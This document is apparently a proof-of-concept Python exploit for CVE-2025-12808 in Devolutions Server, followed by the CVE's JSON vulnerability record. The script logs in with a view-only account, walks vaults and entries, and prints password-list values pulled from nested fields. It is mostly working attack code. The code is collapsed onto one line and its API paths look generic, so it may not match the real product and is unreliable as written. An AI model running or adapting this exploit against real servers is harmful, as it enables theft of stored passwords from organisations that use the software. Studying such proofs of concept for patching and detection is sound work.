CVE-2025-12808

# CVE-2025-12808 PoC - Devolutions Server Password Disclosure # Authenticate with View-only account and retrieve nested sensitive fields import requests import json TARGET = "https://vulnerable-server/devolutions/api" USERNAME = "viewonly_user" PASSWORD = "viewonly_password" def exploit(): # Step 1: Authenticate with low-privilege account session = requests.Session() login_data = {"username": USERNAME, "password": PASSWORD} auth_response = session.post(f"{TARGET}/auth/login", json=login_data) token = auth_response.json().get("token") # Step 2: Enumerate accessible resources headers = {"Authorization": f"Bearer {token}"} vault_response = session.get(f"{TARGET}/vaults", headers=headers) vault_id = vault_response.json()[0]["id"] # Step 3: Access password entries and extract nested fields entries = session.get(f"{TARGET}/vaults/{vault_id}/entries", headers=headers) for entry in entries.json(): entry_id = entry["id"] # Step 4: Retrieve third-level nested sensitive fields detail = session.get( f"{TARGET}/entries/{entry_id}?include_nested=true", headers=headers ) # Extract password list custom values passwords = detail.json().get("customFields", {}).get("passwordList", []) for pw in passwords: print(f"Exposed Password: {pw['value']}") if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2025-12808", "sourceIdentifier": "[email protected]", "published": "2025-11-06T17:15:42.610", "lastModified": "2025-11-10T16:30:59.457", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper access control in Devolutions allows a View-only user to retrieve sensitive third-level nested fields, such as password lists custom values, resulting in password disclosure.\n\n\n\n\n\nThis issue affects the following versions :\n\n * Devolutions Server 2025.3.2.0 through 2025.3.5.0\n * \n\nDevolutions Server 2025.2.15.0 and earlier"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:devolutions:devolutions_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025.2.17.0", "matchCriteriaId": "2A69717C-BA2A-4784-8105-95D2A1A56E65"}, {"vulnerable": true, "criteria": "cpe:2.3:a:devolutions:devolutions_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "2025.3.2.0", "versionEndExcluding": "2025.3.6.0", "matchCriteriaId": "DE204E27-A038-4D0F-A91F-0CF5FF48A992"}]}]}], "references": [{"url": "https://devolutions.net/security/advisories/DEVO-2025-0016", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}